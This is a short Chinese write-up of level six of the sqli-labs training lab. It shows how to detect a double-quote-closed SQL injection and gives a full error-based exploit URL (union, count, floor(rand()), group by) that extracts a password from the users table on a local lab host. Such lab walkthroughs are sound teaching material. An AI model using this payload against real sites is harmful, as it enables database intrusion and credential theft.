sqli-labs系列——第六关(双引号二次查询注入)

文章目录

      • 判断注入
      • 开始注入

判断注入

先输一个单引号看看:
sqli-labs系列——第六关(双引号二次查询注入)_第1张图片

可以看到这里是采用的双引号闭合,那么我们就在后边让它跟一个双引号报错:
sqli-labs系列——第六关(双引号二次查询注入)_第2张图片

开始注入

第六关其实就是一个双引号的二次查询注入,这里就不做过多演示了,原理跟第五关一样,都是用了count()、floor()、rand()、group by语句来进行注入的。

这里直接上exp干了:

http://192.168.1.113:86/Less-6/?id=1" union SELECT null,count(*),concat((select password from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

sqli-labs系列——第六关(双引号二次查询注入)_第3张图片
相关链接:二次查询注入

你可能感兴趣的:(sqli-labs)